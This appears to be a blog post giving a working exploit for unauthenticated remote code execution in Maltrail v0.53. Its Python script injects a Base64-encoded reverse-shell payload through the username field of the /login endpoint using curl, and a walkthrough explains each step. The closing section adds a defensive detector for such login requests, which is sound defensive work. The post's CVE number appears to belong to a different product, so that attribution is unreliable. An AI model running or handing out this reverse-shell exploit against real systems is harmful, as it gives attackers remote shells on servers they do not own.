Exploiting Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)
In this blog post, we will delve into an exploit for Maltrail v0.53, which allows for unauthenticated remote code execution (RCE). This vulnerability has been assigned the identifier CVE-2023-27163.
Overview:
Exploit Title: Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)
Exploit Author: Iyaad Luqman K (init_6)
Application: Maltrail v0.53
Tested on: Ubuntu 22.04
CVE: CVE-2023-27163
Proof of Concept (PoC):
The exploit leverages a vulnerability in the Maltrail application to execute arbitrary code on the target system. The code provided below demonstrates the exploit in action:
```python
import sys
import os
import base64


def main():
    listening_IP = None
    listening_PORT = None
    target_URL = None

    # Exactly three arguments are expected: listening IP, listening port, target URL.
    if len(sys.argv) != 4:
        print("Error. Needs listening IP, PORT and target URL.")
        return(-1)

    listening_IP = sys.argv[1]
    listening_PORT = sys.argv[2]
    target_URL = sys.argv[3] + "/login"  # the request is sent to the login endpoint
    print("Running exploit on " + str(target_URL))
    curl_cmd(listening_IP, listening_PORT, target_URL)


def curl_cmd(my_ip, my_port, target_url):
    payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
    encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
    # The username field carries the shell metacharacters and the encoded payload.
    command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
    os.system(command)


if __name__ == "__main__":
    main()
```
How the Exploit Works:
- The exploit script requires three arguments: the listening IP, listening PORT, and the target URL.
- The script constructs a payload that, when executed, will create a reverse shell connection back to the attacker’s machine.
- This payload is then encoded using Base64 to obfuscate its contents.
- A curl command is constructed to send the payload to the target URL, specifically the login endpoint.
- If successful, the payload is executed on the target system, granting the attacker a shell on the victim machine.
This exploit highlights the importance of regularly updating and patching software. Maltrail v0.53 has a critical vulnerability that allows attackers to execute arbitrary code on the target system without authentication. It’s essential to be aware of such vulnerabilities and take appropriate measures to mitigate them.
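A defensive check built from the request shape described above, as an added example that is not part of the original post or of Maltrail's code: it parses form-encoded `/login` bodies, flags `username` values that contain shell metacharacters, and decodes any Base64 run so the wrapped command is visible to an analyst. The function names, the regular expressions and the sample bodies (which carry a harmless marker command) are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote_plus

# Shell metacharacters that a legitimate login name never needs.
SHELL_META = re.compile(r"[;`|&$<>(){}\\\n]")
# Base64-looking runs long enough to carry a command.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_b64_runs(text):
    """Decode Base64-looking runs in text; keep only ASCII-printable results."""
    decoded = []
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            candidate = raw.decode("ascii")
        except (binascii.Error, ValueError):
            continue
        if candidate.isprintable():
            decoded.append(candidate)
    return decoded


def inspect_login_body(body):
    """Return one finding per suspicious username in a form-encoded /login body."""
    findings = []
    for username in parse_qs(body, keep_blank_values=True).get("username", []):
        meta = sorted(set(SHELL_META.findall(username)))
        if meta:
            findings.append({
                "username": username,
                "metacharacters": meta,
                "decoded": decode_b64_runs(username),
            })
    return findings

# Constructed sample bodies: a harmless marker command stands in for a payload.
MARKER = "echo maltrail-detection-test"
ENCODED_MARKER = base64.b64encode(MARKER.encode()).decode()
SAMPLE_BODIES = [
    "username=admin&password=changeme",
    "username=" + quote_plus(f';`echo "{ENCODED_MARKER}" | base64 -d | sh`'),
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(inspect_login_body(body) or "clean")
```

The same check can run over request bodies captured by a reverse proxy or WAF in front of the Maltrail server; a finding on the unauthenticated login endpoint is worth alerting on even when the decoded list is empty.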